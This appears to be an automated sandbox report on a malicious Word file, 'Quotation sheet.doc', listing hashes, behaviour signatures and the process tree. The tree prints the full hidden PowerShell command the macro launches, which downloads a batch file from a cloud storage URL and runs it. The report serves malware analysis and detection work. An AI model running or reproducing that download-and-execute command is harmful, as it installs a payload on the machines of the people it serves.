Analysis

  • max time kernel
    107s
  • max time network
    43s
  • platform
    windows7_x64
  • resource
    win7-20220414-en
  • submitted
    21-05-2022 04:10

General

  • Target

    Quotation sheet.doc

  • Size

    32KB

  • MD5

    3759688eef1380d504950f2d182feb2a

  • SHA1

    d04c71e2fbdd885b812b0abff05ab9381f84b35c

  • SHA256

    d28b9b95666eb49011c60d4cf91b42ae39e3f9e388f4d87f3e63c55626d54bb4

  • SHA512

    a3ee0cdb252ef8cfd0495964e846538eaba3e24f9b744858d47b07512b3f17e011b69e59b39b012a21b0da16e3113d71be66cf6fd6d0a9b2e9c2484e01f03690

Score
10/10

Malware Config

Signatures

  • Process spawned unexpected child process 1 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • Drops file in Windows directory 1 IoCs
  • Office loads VBA resources, possible macro or embedded object present
  • Modifies Internet Explorer settings 1 TTPs 31 IoCs
  • Modifies registry class 64 IoCs
  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of SetWindowsHookEx 2 IoCs
  • Suspicious use of WriteProcessMemory 8 IoCs

Processes

  • C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE
    "C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\Quotation sheet.doc"
    1⤵
    • Drops file in Windows directory
    • Modifies Internet Explorer settings
    • Modifies registry class
    • Suspicious behavior: AddClipboardFormatListener
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of WriteProcessMemory
    PID:1056
    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoP -NonI -W Hidden "('https://storage.googleapis.com/present_day/srvsocket.bat','')|foreach{$fileName=$env:temp+'\'+(Split-Path -Path $_ -Leaf);(new-object System.Net.WebClient).DownloadFile($_,$fileName);Invoke-Item $fileName;}"
      2⤵
      • Process spawned unexpected child process
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:1308
    • C:\Windows\splwow64.exe
      C:\Windows\splwow64.exe 12288
      2⤵
        PID:1740

    Network

    MITRE ATT&CK Matrix ATT&CK v6

    Defense Evasion

    Modify Registry

    1
    T1112

    Replay Monitor

    Loading Replay Monitor...

    Downloads

    • memory/1056-60-0x00000000006E4000-0x00000000006E8000-memory.dmp
      Filesize

      16KB

    • memory/1056-55-0x0000000070111000-0x0000000070113000-memory.dmp
      Filesize

      8KB

    • memory/1056-56-0x000000005FFF0000-0x0000000060000000-memory.dmp
      Filesize

      64KB

    • memory/1056-57-0x00000000764C1000-0x00000000764C3000-memory.dmp
      Filesize

      8KB

    • memory/1056-58-0x00000000710FD000-0x0000000071108000-memory.dmp
      Filesize

      44KB

    • memory/1056-59-0x00000000006E4000-0x00000000006E8000-memory.dmp
      Filesize

      16KB

    • memory/1056-54-0x0000000072691000-0x0000000072694000-memory.dmp
      Filesize

      12KB

    • memory/1056-67-0x000000005FFF0000-0x0000000060000000-memory.dmp
      Filesize

      64KB

    • memory/1308-61-0x0000000000000000-mapping.dmp
    • memory/1308-63-0x000000006ABB0000-0x000000006B15B000-memory.dmp
      Filesize

      5.7MB

    • memory/1308-64-0x0000000004BE0000-0x0000000005231000-memory.dmp
      Filesize

      6.3MB

    • memory/1740-65-0x0000000000000000-mapping.dmp
    • memory/1740-66-0x000007FEFBD41000-0x000007FEFBD43000-memory.dmp
      Filesize

      8KB